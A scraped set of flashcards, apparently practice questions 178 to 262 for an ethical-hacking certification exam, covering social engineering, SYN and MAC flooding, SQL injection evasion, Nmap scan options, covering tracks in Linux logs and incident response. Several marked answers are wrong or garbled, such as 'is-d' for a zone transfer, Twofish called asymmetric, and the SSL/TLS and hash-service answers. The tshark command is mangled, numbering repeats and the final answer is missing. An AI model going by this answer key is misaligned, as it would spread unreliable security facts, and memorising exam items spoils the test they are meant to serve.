Social Engineering is a training program within sociology studies

A

Social Engineering is the act of getting needed information from a person rather than breaking into a system

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
178
Q

In Trojan terminology, what is a covert channel?

A channel that transfers information within a computer system or network in a way that violates the security policy

A legitimate communication path within a computer system or network for transfer of data

It is a kernel operation that hides boot processes and services to mask detection

It is Reverse tunneling technique that uses HTTPS protocol instead of HTTP protocol to establish connections

A

A channel that transfers information within a computer system or network in a way that violates the security policy

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
179
Q

When a normal TCP connection starts, a destination host receives a SYN (synchronize/start) packet from a source host and sends back a SYN/ACK (synchronize acknowledge). The destination host must then hear an ACK (acknowledge) of the SYN/ACK before the connection is established. This is referred to as the “TCP three-way handshake.” While waiting for the ACK to the SYN ACK, a connection queue of finite size on the destination host keeps track of connections waiting to be completed. This queue typically empties quickly since the ACK is expected to arrive a few milliseconds after the SYN ACK.
How would an attacker exploit this design by launching TCP SYN attack?

Attacker generates TCP SYN packets with random destination addresses towards a victim host

Attacker floods TCP SYN packets with random source addresses towards a victim host

Attacker generates TCP ACK packets with random source addresses towards a victim host

Attacker generates TCP RST packets with random source addresses towards a victim host

A

Attacker floods TCP SYN packets with random source addresses towards a victim host

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
180
Q

Yancey is a network security administrator for a large electric company. This company provides power for over 100, 000 people in Las Vegas. Yancey has worked for his company for over 15 years and has become very successful. One day, Yancey comes in to work and finds out that the company will be downsizing and he will be out of a job in two weeks. Yancey is very angry and decides to place logic bombs, viruses, Trojans, and backdoors all over the network to take down the company once he has left. Yancey does not care if his actions land him in jail for 30 or more years, he just wants the company to pay for what they are doing to him.

What would Yancey be considered?

Yancey would be considered a Suicide Hacker

Since he does not care about going to jail, he would be considered a Black Hat

Because Yancey works for the company currently; he would be a White Hat

Yancey is a Hacktivist Hacker since he is standing up to a company that is downsizing

A

Yancey would be considered a Suicide Hacker

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
181
Q

You receive an e-mail like the one shown below. When you click on the link contained in the mail, you are redirected to a website seeking you to download free Anti-Virus software.

Dear valued customers,
We are pleased to announce the newest version of Antivirus 2010 for Windows which will probe you with total security against the latest spyware, malware, viruses, Trojans and other online threats. Simply visit the link below and enter your antivirus code:

or you may contact us at the following address: Media Internet Consultants, Edif. Neptuno, Planta
Baja, Ave. Ricardo J. Alfaro, Tumba Muerto, n/a Panama

How will you determine if this is Real Anti-Virus or Fake Anti-Virus website?

Look at the website design, if it looks professional then it is a Real Anti-Virus website

Connect to the site using SSL, if you are successful then the website is genuine

Search using the URL and Anti-Virus product name into Google and lookout for suspicious warnings against this site

Download and install Anti-Virus software from this suspicious looking site, your Windows 7 will prompt you and stop the installation if the downloaded file is a malware

Download and install Anti-Virus software from this suspicious looking site, your Windows 7 will prompt you and stop the installation if the downloaded file is a malware

A

Search using the URL and Anti-Virus product name into Google and lookout for suspicious warnings against this site

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
182
Q

Every company needs a formal written document which spells out to employees precisely what they are allowed to use the company’s systems for, what is prohibited, and what will happen to them if they break the rules. Two printed copies of the policy should be given to every employee as soon as possible after they join the organization. The employee should be asked to sign one copy, which should be safely filed by the company. No one should be allowed to use the company’s computer systems until they have signed the policy in acceptance of its terms.

What is this document called?

Information Audit Policy (IAP)
Information Security Policy (ISP)
Penetration Testing Policy (PTP)
Company Compliance Policy (CCP)

A

Information Security Policy (ISP)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
183
Q

Take a look at the following attack on a Web Server using obstructed URL:

How would you protect from these attacks?

Configure the Web Server to deny requests involving “hex encoded” characters

Create rules in IDS to alert on strange Unicode requests

Use SSL authentication on Web Servers

Enable Active Scripts Detection at the firewall and routers

A

Create rules in IDS to alert on strange Unicode requests

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
184
Q

Which type of sniffing technique is generally referred as MiTM attack?

Password Sniffing
ARP Poisoning
Mac Flooding
DHCP Sniffing

A

ARP Poisoning

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
185
Q

Switches maintain a CAM Table that maps individual MAC addresses on the network to physical ports on the switch.

In MAC flooding attack, a switch is fed with many Ethernet frames, each containing different source MAC addresses, by the attacker. Switches have a limited memory for mapping various MAC addresses to physical ports. What happens when the CAM table becomes full?

Switch then acts as hub by broadcasting packets to all machines on the network

The CAM overflow table will cause the switch to crash causing Denial of Service

The switch replaces outgoing frame switch factory default MAC address of FF:FF:FF:FF:FF:FF

Every packet is dropped and the switch sends out SNMP alerts to the IDS port

A

Switch then acts as hub by broadcasting packets to all machines on the network

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
186
Q

You went to great lengths to install all the necessary technologies to prevent hacking attacks, such as expensive firewalls, antivirus software, anti-spam systems and intrusion detection/prevention tools in your company’s network. You have configured the most secure policies and tightened every device on your network. You are confident that hackers will never be able to gain access to your network with complex security system in place.
Your peer, Peter Smith who works at the same department disagrees with you.
He says even the best network security technologies cannot prevent hackers gaining access to the network because of presence of “weakest link” in the security chain. What is Peter Smith talking about?

Untrained staff or ignorant computer users who inadvertently become the weakest link in your security chain

“Zero-day” exploits are the weakest link in the security chain since the IDS will not be able to detect these attacks

“Polymorphic viruses” are the weakest link in the security chain since the Anti-Virus scanners will not be able to detect these attacks

Continuous Spam e-mails cannot be blocked by your security system since spammers use different techniques to bypass the filters in your gateway

A

Untrained staff or ignorant computer users who inadvertently become the weakest link in your security chain

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
187
Q

How does a denial-of-service attack work?

A hacker prevents a legitimate user (or group of users) from accessing a service

A hacker uses every character, word, or letter he or she can think of to defeat authentication

A hacker tries to decipher a password by using a system, which subsequently crashes the network

A hacker attempts to imitate a legitimate user by confusing a computer or even another person

A

A hacker prevents a legitimate user (or group of users) from accessing a service

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
188
Q

You are trying to break into a highly classified top-secret mainframe computer with highest security system in place at Merclyn Barley Bank located in Los Angeles.
You know that conventional hacking doesn’t work in this case, because organizations such as banks are generally tight and secure when it comes to protecting their systems.
In other words, you are trying to penetrate an otherwise impenetrable system. How would you proceed?

Look for “zero-day” exploits at various underground hacker websites in Russia and China and buy the necessary exploits from these hackers and target the bank’s network

Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they’ll abuse their access privileges by providing you with sensitive information

Launch DDOS attacks against Merclyn Barley Bank’s routers and firewall systems using 100, 000 or more “zombies” and “bots”

Try to conduct Man-in-the-Middle (MiTM) attack and divert the network traffic going to the Merclyn Barley Bank’s Webserver to that of your machine using DNS Cache Poisoning techniques

A

Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they’ll abuse their access privileges by providing you with sensitive information

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
189
Q

This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data.

What is this attack?

Cross-site-scripting attack
SQL Injection
URL Traversal attack
Buffer Overflow attack

A

Cross-site-scripting attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
190
Q

Which utility will tell you in real time which ports are listening or in another state?

Netstat
TCPView
Nmap
Loki

A

TCPView

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
191
Q

During an Xmas scan what indicates a port is closed?

No return response
RST
ACK
SYN

A

RST

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
192
Q

Matthew, a black hat, has managed to open a meterpreter session to one of the kiosk machines in Evil Corp’s lobby. He checks his current SID, which is S-1-5-21-1223352397-1872883824-861252104- 501. What needs to happen before Matthew has full administrator access?

He must perform privilege escalation.
He needs to disable antivirus protection.
He needs to gain physical access.
He already has admin privileges, as shown by the “501” at the end of the SID.

A

He must perform privilege escalation.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
193
Q

An LDAP directory can be used to store information similar to a SQL database. LDAP uses a ___ database structure instead of SQL’s ___ structure. Because of this, LDAP has difficulty representing many-to-one relationships.

Relational, Hierarchical
Strict, Abstract
Hierarchical, Relational
Simple, Complex

A

Hierarchical, Relational

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
194
Q

Elliot is in the process of exploiting a web application that uses SQL as a back-end database. He’s determined that the application is vulnerable to SQL injection, and has introduced conditional timing delays into injected queries to determine whether they are successful. What type of SQL injection is Elliot most likely performing?

Error-based SQL injection
Blind SQL injection
Union-based SQL injection
NoSQL injection

A

Blind SQL injection

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
195
Q

You are performing a penetration test for a client and have gained shell access to a Windows machine on the internal network. You intend to retrieve all DNS records for the internal domain, if the DNS server is at 192.168.10.2 and the domain name is abccorp.local, what command would you type at the nslookup prompt to attempt a zone transfer?

list server=192.168.10.2 type=all
is-d abccorp.local
Iserver 192.168.10.2-t all
List domain=Abccorp.local type=zone

A

is-d abccorp.local

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
195
Q

John is an incident handler at a financial institution. His steps in a recent incident are not up to the standards of the company. John frequently forgets some steps and procedures while handling responses as they are very stressful to perform. Which of the following actions should John take to overcome this problem with the least administrative effort?

Create an incident checklist.
Select someone else to check the procedures.
Increase his technical skills.
Read the incident manual every time it occurs.

A

Create an incident checklist.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
196
Q

OpenSSL on Linux servers includes a command line tool for testing TLS. What is the name of the tool and the correct syntax to connect to a web server?

openssl s_client -site www.website.com:443
openssl_client -site www.website.com:443
openssl s_client -connect www.website.com:443
openssl_client -connect www.website.com:443

A

openssl s_client -connect www.website.com:443

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
197
Q

What is the purpose of DNS AAAA record?

Authorization, Authentication and Auditing record
Address prefix record
Address database record
IPv6 address resolution record

A

IPv6 address resolution record

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
198
Q

Tremp is an IT Security Manager, and he is planning to deploy an IDS in his small company. He is looking for an IDS with the following characteristics: - Verifies success or failure of an attack - Monitors system activities Detects attacks that a network-based IDS fails to detect - Near real-time detection and response - Does not require additional hardware - Lower entry cost Which type of IDS is best suited for Tremp’s requirements?

Gateway-based IDS
Network-based IDS
Host-based IDS
Open source-based

A

Host-based IDS

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
199
Q

What kind of detection techniques is being used in antivirus softwares that identifies malware by collecting data from multiple protected systems and instead of analyzing files locally it’s made on the premiers environment-

VCloud based
Honypot based
Behaviour based
Heuristics based

A

VCloud based

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
200
Q

Gavin owns a white-hat firm and is performing a website security audit for one of his clients. He begins by running a scan which looks for common misconfigurations and outdated software versions. Which of the following tools is he most likely using?

Nikto
Nmap
Metasploit
Armitage

A

Nikto

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
201
Q

Which of the following statements is FALSE with respect to Intrusion Detection Systems?

Intrusion Detection Systems can be configured to distinguish specific content in network packets

Intrusion Detection Systems can easily distinguish a malicious payload in an encrypted traffic

Intrusion Detection Systems require constant update of the signature library

Intrusion Detection Systems can examine the contents of the data in context of the network protocol

A

Intrusion Detection Systems can easily distinguish a malicious payload in an encrypted traffic

202
Q

While scanning with Nmap, Patin found several hosts which have the IP ID of incremental sequences. He then decided to conduct: nmap -Pn -p- -si kiosk.adobe.com www.riaa.com. kiosk.adobe.com is the host with incremental IP ID sequence. What is the purpose of using “-si” with Nmap?

Conduct stealth scan
Conduct ICMP scan
Conduct IDLE scan
Conduct silent scan

A

Conduct IDLE scan

203
Q

Which command can be used to show the current TCP/IP connections?

Netsh
Netstat
Net use connection
Net use

A

Netstat

204
Q

You are analysing traffic on the network with Wireshark. You want to routinely run a cron job which will run the capture against a specific set of IPs - 192.168.8.0/24. What command you would use?

wireshark –fetch ‘‘192.168.8*’’
wireshark –capture –local masked 192.168.8.0 —range 24
tshark -net 192.255.255.255 mask 192.168.8.0
sudo tshark -f’‘net 192 .68.8.0/24’’

A

sudo tshark -f’‘net 192 .68.8.0/24’’

205
Q

You are tasked to configure the DHCP server to lease the last 100 usable IP addresses in subnet to 10.1.4.0/23. Which of the following IP addresses could be teased as a result of the new configuration?

210.1.55.200
10.1.4.254
10.1.5.200
10.1.4.156

A

10.1.5.200

206
Q

You have successfully logged on a Linux system. You want to now cover your tracks. Your login attempt may be logged on several files located in /var/log. Which file does NOT belongs to the list:

user.log
auth.fesg
wtmp
btmp

A

wtmp

207
Q

The tools which receive event logs from servers, network equipment, and applications, and perform analysis and correlation on those logs, and can generate alarms for security relevant issues, are known as what?

network Sniffer
Vulnerability Scanner
Intrusion prevention Server
Security incident and event Monitoring

A

Security incident and event Monitoring

208
Q

What is the main security service a cryptographic hash provides?

Integrity and ease of computation
Message authentication and collision resistance
Integrity and collision resistance
Integrity and computational in-feasibility

A

Integrity and computational in-feasibility

209
Q

A pen tester is configuring a Windows laptop for a test. In setting up Wireshark, what river and library are required to allow the NIC to work in promiscuous mode?

Libpcap
Awinpcap
Winprom
Winpcap

A

Winpcap

210
Q

What is one of the advantages of using both symmetric and asymmetric cryptography in SSL/TLS?

Symmetric algorithms such as AES provide a failsafe when asymmetric methods fail.

Asymmetric cryptography is computationally expensive in comparison. However, it is well-suited to securely negotiate keys for use with symmetric cryptography.

Symmetric encryption allows the server to securely transmit the session keys out-of-band.

Supporting both types of algorithms allows less-powerful devices such as mobile phones to use symmetric encryption instead.

A

Supporting both types of algorithms allows less-powerful devices such as mobile phones to use symmetric encryption instead.

211
Q

When a security analyst prepares for the formal security assessment - what of the following should be done in order to determine inconsistencies in the secure assets database and verify that system is compliant to the minimum security baseline?

Data items and vulnerability scanning
Interviewing employees and network engineers
Reviewing the firewalls configuration
Source code review

A

Data items and vulnerability scanning

212
Q

Why are containers less secure than virtual machines?

Host OS on containers has a larger surface attack.

Containers may full fill disk space of the host.

A compromise container may cause a CPU starvation of the host.

Containers are attached to the same virtual network.

A

Host OS on containers has a larger surface attack.

213
Q

These hackers have limited or no training and know how to use only basic techniques or tools. What kind of hackers are we talking about?

Black-Hat Hackers A
Script Kiddies
White-Hat Hackers
Gray-Hat Hacker

A

Script Kiddies

214
Q

Bob, your senior colleague, has sent you a mail regarding a deal with one of the clients. You are requested to accept the offer and you oblige. After 2 days. Bob denies that he had ever sent a mail. What do you want to ““know”” to prove yourself that it was Bob who had send a mail?

Authentication
Confidentiality
Integrity
Non-Repudiation

A

Non-Repudiation

215
Q

In the field of cryptanalysis, what is meant by a “rubber-hose” attack?

Attempting to decrypt cipher text by making logical assumptions about the contents of the original plain text.
Extraction of cryptographic secrets through coercion or torture.
Forcing the targeted key stream through a hardware-accelerated device such as an ASIC.
A backdoor placed into a cryptographic algorithm by its creator.

A

Extraction of cryptographic secrets through coercion or torture.

216
Q

What type of analysis is performed when an attacker has partial knowledge of inner-workings of the application?

Black-box
Announced
White-box
Grey-box

A

Grey-box

217
Q

Which of the following steps for risk assessment methodology refers to vulnerability identification?

Determines if any flaws exist in systems, policies, or procedures

Assigns values to risk probabilities, impact values

Determines risk probability that vulnerability will be exploited (High, Medium, Low)

Identifies sources of harm to an IT system (Natural, Human, Environmental)

A

Determines if any flaws exist in systems, policies, or procedures

218
Q

Log monitoring tools performing behavioral analysis have alerted several suspicious logins on a Linux server occurring during non-business hours. After further examination of all login activities, it is noticed that none of the logins have occurred during typical work hours. A Linux administrator who is investigating this problem realizes the system time on the Linux server is wrong by more than twelve hours. What protocol used on Linux servers to synchronize the time has stopped working?

Time Keeper
NTP
PPP
OSPP

A

NTP

219
Q

What is the minimum number of network connections in a multi homed firewall?

3
5
4
2

A

3

220
Q

Which of the following DoS tools is used to attack target web applications by starvation of available sessions on the web server?
The tool keeps sessions at halt using never-ending POST transmissions and sending an arbitrarily large content-length header value.

My Doom
Astacheldraht
R-U-Dead-Yet?(RUDY)
LOIC

A

R-U-Dead-Yet?(RUDY)

221
Q

During the process of encryption and decryption, what keys are shared?

Private keys
User passwords
Public keys
Public and private keys

A

Public keys

222
Q

You need a tool that can do network intrusion prevention and intrusion detection, function as a network sniffer, and record network activity, what tool would you most likely select?

Nmap
Cain & Abel
Nessus
Snort

A

Snort

223
Q

How is the public key distributed in an orderly, controlled fashion so that the users can be sure of the sender’s identity?

Hash value
Private key
Digital signature
Digital certificate

A

Digital certificate

224
Q

The network team has well-established procedures to follow for creating new rules on the firewall. This includes having approval from a manager prior to implementing any new rules. While reviewing the firewall configuration, you notice a recently implemented rule but cannot locate manager approval for it. What would be a good step to have in the procedures for a situation like this?

Have the network team document the reason why the rule was implemented without prior manager approval.

Monitor all traffic using the firewall rule until a manager can approve it.

Do not roll back the firewall rule as the business may be relying upon it, but try to get manager approval as soon as possible.

Immediately roll back the firewall rule until a manager can approve it

A

Immediately roll back the firewall rule until a manager can approve it

225
Q

The Payment Card Industry Data Security Standard (PCI DSS) contains six different categories of control objectives. Each objective contains one or more requirements, which must be followed in order to achieve compliance. Which of the following requirements would best fit under the objective, “Implement strong access control measures”?

Regularly test security systems and processes.

Encrypt transmission of cardholder data across open, public networks.

Assign a unique ID to each person with computer access.

Use and regularly update anti-virus software on all systems commonly affected by malware.

A

Assign a unique ID to each person with computer access.

226
Q

Nedved is an IT Security Manager of a bank in his country. One day he found out that there is a security breach to his company’s email server based on analysis of a suspicious connection from the email server to an unknown IP Address.

What is the first thing that Nedved needs to do before contacting the incident response team?

Leave it as it Is and contact the incident response team right away

Block the connection to the suspicious IP Address from the firewall

Disconnect the email server from the network

Migrate the connection to the backup email server

A

Disconnect the email server from the network

227
Q

Vlady works in a fishing company where the majority of the employees have very little understanding of IT let alone IT Security. Several information security issues that Vlady often found includes, employees sharing password, writing his/her password on a post it note and stick it to his/her desk, leaving the computer unlocked, didn’t log out from emails or other social media accounts, and etc. After discussing with his boss, Vlady decided to make some changes to improve the security environment in his company. The first thing that Vlady wanted to do is to make the employees understand the importance of keeping confidential information, such as password, a secret and they should not share it with other persons.
Which of the following steps should be the first thing that Vlady should do to make the employees in his company understand to importance of keeping confidential information a secret?

Warning to those who write password on a post it note and put it on his/her desk
Developing a strict information security policy
Information security awareness training
Conducting a one to one discussion with the other employees about the importance of information security

A

Warning to those who write password on a post it note and put it on his/her desk

228
Q

Clark, a professional hacker, was hired by an organization lo gather sensitive Information about its competitors surreptitiously. Clark gathers the server IP address of the target organization using Whole footprinting. Further, he entered the server IP address as an input to an online tool to retrieve information such as the network range of the target organization and to identify the network topology and operating system used in the network. What is the online tool employed by Clark in the above scenario?

AOL
ARIN
DuckDuckGo
Baidu

A

ARIN

229
Q

Jim, a professional hacker, targeted an organization that is operating critical Industrial Infrastructure.
Jim used Nmap to scan open pons and running services on systems connected to the organization’s OT network. He used an Nmap command to identify Ethernet/IP devices connected to the Internet and further gathered Information such as the vendor name, product code and name, device name, and IP address. Which of the following Nmap commands helped Jim retrieve the required information?

nmap -Pn -sT –scan-delay 1s –max-parallelism 1 -p < Port List > < Target IP >
nmap -Pn -sU -p 44818 –script enip-info < Target IP >
nmap -Pn -sT -p 46824 < Target IP >
nmap -Pn -sT -p 102 –script s7-info < Target IP >

A

nmap -Pn -sU -p 44818 –script enip-info < Target IP >

230
Q

There have been concerns in your network that the wireless network component is not sufficiently secure. You perform a vulnerability scan of the wireless network and find that it is using an old encryption protocol that was designed to mimic wired encryption, what encryption protocol is being used?

WEP
RADIUS
WPA
WPA3

A

WEP

231
Q

Attacker Lauren has gained the credentials of an organization’s internal server system, and she was often logging in during irregular times to monitor the network activities. The organization was skeptical about the login times and appointed security professional Robert to determine the issue. Robert analyzed the compromised device to find incident details such as the type of attack, its severity, target, impact, method of propagation, and vulnerabilities exploited. What is the incident handling and response (IH&R) phase, in which Robert has determined these issues?

Preparation
Eradication
Incident recording and assignment
Incident triage

A

Incident triage

232
Q

David is a security professional working in an organization, and he is implementing a vulnerability management program in the organization to evaluate and control the risks and vulnerabilities in its IT infrastructure. He is currently executing the process of applying fixes on vulnerable systems to reduce the impact and severity of vulnerabilities. Which phase of the vulnerability-management life cycle is David currently in?

verification
Risk assessment
Vulnerability scan
Remediation

A

Remediation

233
Q

Widespread fraud ac Enron. WorldCom, and Tyco led to the creation of a law that was designed to improve the accuracy and accountability of corporate disclosures. It covers accounting firms and third parties that provide financial services to some organizations and came into effect in 2002. This law is known by what acronym?

Fed RAMP
PCIDSS
SOX
HIPAA

A

SOX

234
Q

Robin, a professional hacker, targeted an organization’s network to sniff all the traffic. During this process.
Robin plugged in a rogue switch to an unused port in the LAN with a priority lower than any other switch in the network so that he could make it a root bridge that will later allow him to sniff all the traffic in the network.
What is the attack performed by Robin in the above scenario?

ARP spoofing attack
VLAN hopping attack
DNS poisoning attack
STP attack

A

STP attack

235
Q

Abel, a security professional, conducts penetration testing in his client organization to check for any security loopholes. He launched an attack on the DHCP servers by broadcasting forged DHCP requests and leased all the DHCP addresses available in the DHCP scope until the server could not issue any more IP addresses. This led to a Dos attack, and as a result, legitimate employees were unable to access the clients network. Which of the following attacks did Abel perform in the above scenario?

VLAN hopping
DHCP starvation
Rogue DHCP server attack
STP attack

A

DHCP starvation

236
Q

At what stage of the cyber kill chain theory model does data exfiltration occur?

Actions on objectives
Weaponization
installation
Command and control

A

Actions on objectives

237
Q

Techno Security Inc. recently hired John as a penetration tester. He was tasked with identifying open ports in the target network and determining whether the ports are online and any firewall rule sets are encountered. John decided to perform a TCP SYN ping scan on the target network. Which of the following Nmap commands must John use to perform the TCP SYN ping scan?

nmap -sn -pp < target ip address >
nmap -sn -PO < target IP address >
nmap -sn -PS < target IP address >
nmap -sn -PA < target IP address >

A

nmap -sn -PS < target IP address >

238
Q

Ricardo has discovered the username for an application in his targets environment. As he has a limited amount of time, he decides to attempt to use a list of common passwords he found on the Internet. He compiles them into a list and then feeds that list as an argument into his password- cracking application, what type of attack is Ricardo performing?

Known plaintext
Password spraying
Brute force
Dictionary

A

Dictionary

239
Q

Richard, an attacker, aimed to hack loT devices connected to a target network. In this process. Richard recorded the frequency required to share information between connected devices. After obtaining the frequency, he captured the original data when commands were initiated by the connected devices. Once the original data were collected, he used free tools such as URH to segregate the command sequence. Subsequently, he started injecting the segregated command sequence on the same frequency into the loT network, which repeats the captured signals of the devices. What Is the type of attack performed by Richard In the above scenario?

Side-channel attack
Replay attack
CrypTanalysis attack
Reconnaissance attack

A

Replay attack

240
Q

This form of encryption algorithm is asymmetric key block cipher that is characterized by a 128-bit block size, and its key size can be up to 256 bits. Which among the following is this encryption algorithm?

Twofish encryption algorithm
HMAC encryption algorithm
IDEA
Blowfish encryption algorithm

A

Twofish encryption algorithm

240
Q

Sam is working as a system administrator In an organization. He captured the principal characteristics of a vulnerability and produced a numerical score to reflect Its severity using CVSS v3.0 to property assess and prioritize the organization’s vulnerability management processes. The base score that Sam obtained after performing cvss rating was 4.0. What is the CVSS severity level of the vulnerability discovered by Sam in the above scenario?

Medium
Low
Critical
High

A

Medium

241
Q

Jane invites her friends Alice and John over for a LAN party. Alice and John access Jane’s wireless network without a password. However. Jane has a long, complex password on her router. What attack has likely occurred?

Wireless sniffing
Piggybacking
Evil twin
Wardriving

A

Evil twin

242
Q

Nicolas just found a vulnerability on a public-facing system that is considered a zero-day vulnerability. He sent an email to the owner of the public system describing the problem and how the owner can protect themselves from that vulnerability. He also sent an email to Microsoft informing them of the problem that their systems are exposed to. What type of hacker is Nicolas?

Red hat
White hat
Black hat
Gray hat

A

White hat

243
Q

You are a penetration tester tasked with testing the wireless network of your client Brakeme S A. You are attempting to break into the wireless network with the SSID “Brakeme-lnternal.” You realize that this network uses WPA3 encryption, which of the following vulnerabilities is the promising to exploit?

Dragonblood
Cross-site request forgery
Key reinstallation attack
AP Myconfiguration

A

Dragonblood

244
Q

To invisibly maintain access to a machine, an attacker utilizes a toolkit that sits undetected In the core components of the operating system. What is this type of rootkit an example of?

Mypervisor rootkit
Kernel toolkit
Hardware rootkit
Firmware rootkit

A

Kernel toolkit

245
Q

Alice needs to send a confidential document to her coworker. Bryan. Their company has public key infrastructure set up. Therefore, Alice both encrypts the message and digitally signs it. Alice uses ___ to encrypt the message, and Bryan uses ___ to confirm the digital signature.

Bryan’s public key; Bryan’s public key
Alice’s public key; Alice’s public key
Bryan’s private key; Alice’s public key
Bryan’s public key; Alice’s public key

A

Bryan’s public key; Alice’s public key

246
Q

What piece of hardware on a computer’s motherboard generates encryption keys and only releases a part of the key so that decrypting a disk on a new piece of hardware is not possible?

CPU
GPU
UEFI
TPM

A

TPM

247
Q

Security administrator John Smith has noticed abnormal amounts of traffic coming from local computers at night. Upon reviewing, he finds that user data have been exfilltrated by an attacker. AV tools are unable to find any malicious software, and the IDS/IPS has not reported on any non- whitelisted programs, what type of malware did the attacker use to bypass the company’s application whitelisting?

Phishing malware
Zero-day malware
File-less malware
Logic bomb malware

A

File-less malware

248
Q

Taylor, a security professional, uses a tool to monitor her company’s website, analyze the website’s
traffic, and track the geographical location of the users visiting the company’s website. Which of the following tools did Taylor employ in the above scenario?

WebSite Watcher
web-Stat
Webroot
WAFW00F

A

web-Stat

249
Q

Gilbert, a web developer, uses a centralized web API to reduce complexity and increase the Integrity of updating and changing data. For this purpose, he uses a web service that uses HTTP methods such as PUT. POST. GET. and DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application. What is the type of web-service API mentioned in the above scenario?

JSON-RPC
SOAP API
RESTful API
REST API

A

RESTful API

250
Q

Gerard, a disgruntled ex-employee of Sunglass IT Solutions, targets this organization to perform sophisticated attacks and bring down its reputation in the market. To launch the attacks process, he performed DNS footprinting to gather information about ONS servers and to identify the hosts connected in the target network. He used an automated tool that can retrieve information about DNS zone data including DNS domain names, computer names. IP addresses. DNS records, and network Who is records. He further exploited this information to launch other sophisticated attacks. What is the tool employed by Gerard in the above scenario?

Knative
zANTI
Towelroot
Bluto

A

Bluto

251
Q

Boney, a professional hacker, targets an organization for financial benefits. He performs an attack by sending his session ID using an MITM attack technique. Boney first obtains a valid session ID by logging into a service and later feeds the same session 10 to the target employee. The session ID links the target employee to Boneys account page without disclosing any information to the victim. When the target employee clicks on the link, all the sensitive payment details entered in a form are linked to Boneys account. What is the attack performed by Boney in the above scenario?

Session donation attack
Session fixation attack
Forbidden attack
CRIME attack

A

Session donation attack

252
Q

Which of the following commands checks for valid users on an SMTP server?

RCPT
CHK
VRFY
EXPN

A

VRFY

253
Q

Bobby, an attacker, targeted a user and decided to hijack and intercept all their wireless communications. He installed a fake communication tower between two authentic endpoints to mislead the victim. Bobby used this virtual tower to interrupt the data transmission between the user and real tower, attempting to hijack an active session, upon receiving the users request. Bobby manipulated the traffic with the virtual tower and redirected the victim to a malicious website. What is the attack performed by Bobby in the above scenario?

Wardriving
KRACK attack
jamming signal attack
aLTEr attack

A

aLTEr attack

254
Q

In the Common Vulnerability Scoring System (CVSS) v3.1 severity ratings, what range does medium vulnerability fall in?

3.0-6.9
4.0-6.0
4.0-6.9
3.9-6.9

A

4.0-6.9

255
Q

What is the file that determines the basic configuration (specifically activities, services, broadcast receivers, etc.) in an Android application?

AndroidManifest.xml
APK.info
resources.asrc
classes.dex

A

AndroidManifest.xml

256
Q

A friend of yours tells you that he downloaded and executed a file that was sent to him by a coworker. Since the file did nothing when executed, he asks you for help because he suspects that he may have installed a trojan on his computer.
what tests would you perform to determine whether his computer Is Infected?

Use ExifTool and check for malicious content.
You do not check; rather, you immediately restore a previous snapshot of the operating system.
Upload the file to VirusTotal.
Use netstat and check for outgoing connections to strange IP addresses or domains.

A

Use netstat and check for outgoing connections to strange IP addresses or domains.

257
Q

Garry is a network administrator in an organization. He uses SNMP to manage networked devices from a remote location. To manage nodes in the network, he uses MIB. which contains formal descriptions of all network objects managed by SNMP. He accesses the contents of MIB by using a web browser either by entering the IP address and Lseries.mlb or by entering the DNS library name and Lseries.mlb. He is currently retrieving information from an MIB that contains object types for workstations and server services. Which of the following types of MIB is accessed by Garry in the above scenario?

LNMIB2.MIB
WINS.MIB
DHCP.MIS
MIB_II.MIB

A

LNMIB2.MIB

258
Q

An attacker redirects the victim to malicious websites by sending them a malicious link by email. The link appears authentic but redirects the victim to a malicious web page, which allows the attacker to steal the victim’s data.

What type of attack is this?

Phishing
Vlishing
Spoofing
DDoS

A

Phishing

259
Q

Steve, an attacker, created a fake profile on a social media website and sent a request to Stella. Stella was enthralled by Steve’s profile picture and the description given for his profile, and she initiated a conversation with him soon after accepting the request. After a few days. Sieve started asking about her company details and eventually gathered all the essential information regarding her company. What is the social engineering technique Steve employed in the above scenario?

A. Diversion theft
Baiting
Honey trap
Piggybacking

A

Honey trap

260
Q

Daniel Is a professional hacker who Is attempting to perform an SQL injection attack on a target website. www.movlescope.com. During this process, he encountered an IDS that detects SQL Injection attempts based on predefined signatures. To evade any comparison statement, he attempted placing characters such as ‘’or ‘1’=’1” In any bask injection statement such as “or 1=1.” Identify the evasion technique used by Daniel in the above scenario.

Null byte
IP fragmentation
Char encoding
Variation

A

Variation

261
Q

While browsing his Facebook teed, Matt sees a picture one of his friends posted with the caption. “Learn more about your friends!”, as well as a number of personal questions. Matt is suspicious and texts his friend, who confirms that he did indeed post it. With assurance that the post is legitimate. Matt responds to the questions on the post, a few days later. Mates bank account has been accessed, and the password has been changed. What most likely happened?

Matt inadvertently provided the answers to his security questions when responding to the post.
Matt’s bank-account login information was brute forced.
Matt Inadvertently provided his password when responding to the post.
Matt’s computer was infected with a keylogger.

A

Matt inadvertently provided the answers to his security questions when responding to the post.

262
Q

Jane, an ethical hacker. Is testing a target organization’s web server and website to identity security loopholes. In this process, she copied the entire website and its content on a local drive to view the complete profile of the site’s directory structure, file structure, external links, images, web pages, and so on. This information helps jane map the website’s directories and gain valuable information. What is the attack technique employed by Jane in the above scenario?

website mirroring
Session hijacking
Web cache poisoning
Website defacement

A

